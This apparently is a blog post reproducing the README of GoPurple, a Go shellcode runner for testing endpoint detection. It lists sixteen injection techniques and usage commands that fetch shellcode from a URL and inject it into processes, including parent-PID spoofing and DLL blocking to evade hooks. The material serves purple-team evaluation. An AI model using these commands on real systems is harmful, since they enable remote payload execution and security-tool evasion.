Kali Linux

GoPurple : Yet Another Shellcode Runner Consists Of Different Techniques For Evaluating Detection Capabilities Of Endpoint Security Solutions

GoPurple is a simple collection of various shell code injection techniques, aiming to streamline the process of endpoint detection evaluation, beside challenging myself to get into Golang world.

Installation

  • Requires go installed.
  • Build the application from the project’s directory: go build. Set GOOS=windows if the build system is not Windows

_ / | | |
| | _
_ _ _ _ _ _ _ | |
| | |_ |/ _ | ‘_ | | | | ‘
| ‘_ | |/ _ \
| || | () | |) | || | | | |) | | /
_____|___/| ./ __,|| | ./||__|
| | | |
|| || by @s3cdev
-a string
Program command line arguments
-b string
block DLL mode (nonms/onlystore for QueueUserAPC )
-p int
Process ID to inject shellcode into
-prog string
program to inject into
-t string
shellcode injection technique to use:
1: CreateFiber
2: syscall
3: CreateThreadNative
4: CreateProcess
5: EtwpCreateEtwThread
6: CreateRemoteThread
7: RtlCreateUserThread
8: CreateThread
9: CreateRemoteThreadNative
10: CreateProcessWithPipe
11: QueueUserAPC
12: CreateThreadpoolWait
13: BananaPhone
14: EnumerateLoadedModules
15: EnumChildWindows
16: EnumPageFilesW
-u string
URL hosting the shellcode

Examples

A shellcode needs to be generated,this can be done using tools such as msfvenom or shad0w. Then the shellcode needs to be hosted to be remotely downloaded and executed on the remote machine. For the sake of clarity, the below demos illustrate different ways of using the tool.

  • Shellcode injection using BananaPhone method + Shad0w as the shellcode generator
  • Shellcode injection using QueueUserAPC technique + Shad0w as the shellcode generator + spoofing the parent ID (explorer as the parent ID) + process launching by spoofed parent that contains the shellcode(calc) + protecting the process from unsigned DLL hook, so only Microsoft signed DLL can hook into the process.
  • Shellcode injection using CreateFiber + msfvenom as the shellcode generator

How To Use

1 – gopurple.exe -u urlhostingpayload -t 1 (CreateFiber)
2 – gopurple.exe -u urlhostingpayload -t 2 (Syscall)
3 – gopurple.exe -u urlhostingpayload -t 3 (CreateThreadNative)
4 – gopurple.exe -u urlhostingpayload -t 4 (CreateProcess)
5 – gopurple.exe -u urlhostingpayload -t 5 (EtwpCreateEtwThread)
6 – gopurple.exe -u urlhostingpayload -t 6 -p targetprocess (CreateRemoteThread)
7 – gopurple.exe -u urlhostingpayload -t 7 -p targetprocess (RtlCreateUserThread)
8 – gopurple.exe -u urlhostingpayload -t 8 (CreateThread)
9 – gopurple.exe -u urlhostingpayload -t 9 -p targetprocess (CreateRemoteThreadNative)
10 – gopurple.exe -u urlhostingpayload -t 10 -prog porgram -a processargument (ex:C:\Windows\System32\WindowsPowerShell\v1.0) and processargument(ex:Get-Process) (CreateProcessWithPipe)
11 – gopurple.exe -u urlhostingpayload -t 11 -p targetpidasparentprocess -prog programtoinjectshellcodeinto -b methodtoblockdll(nonms or onlystore) (QueueUserAPC)
nonms = only DLLs that are signed by Microsoft can hook into the process
onlystore = only Microsoft store application’s process can hook into the process
12 – gopurple.exe -u urlhostingpayload -t 12 (CreateThreadpoolWait)
13 – gopurple.exe -u urlhostingpayload -t 13 (BananaPhone)
14- gopurple.exe -u urlhostingpayload -t 14 (EnumerateLoadedModules)
15- gopurple.exe -u urlhostingpayload -t 15 (EnumChildWindows)
16- gopurple.exe -u urlhostingpayload -t 16 (EnumPageFilesW)

R K

Recent Posts

Cybersecurity – Tools And Their Function

Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…

10 hours ago

MODeflattener – Miasm’s OLLVM Deflattener

MODeflattener is a specialized tool designed to reverse OLLVM's control flow flattening obfuscation through static…

10 hours ago

My Awesome List : Tools And Their Functions

"My Awesome List" is a curated collection of tools, libraries, and resources spanning various domains…

10 hours ago

Chrome Browser Exploitation, Part 3 : Analyzing And Exploiting CVE-2018-17463

CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, allowed attackers to execute arbitrary…

10 hours ago

Chrome Browser Exploitation, Part 1 : Introduction To V8 And JavaScript Internals

The blog post "Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals" provides…

10 hours ago

Chrome Browser Exploitation, Part 3: Analyzing and Exploiting CVE-2018-17463

The exploitation of CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, relies on…

13 hours ago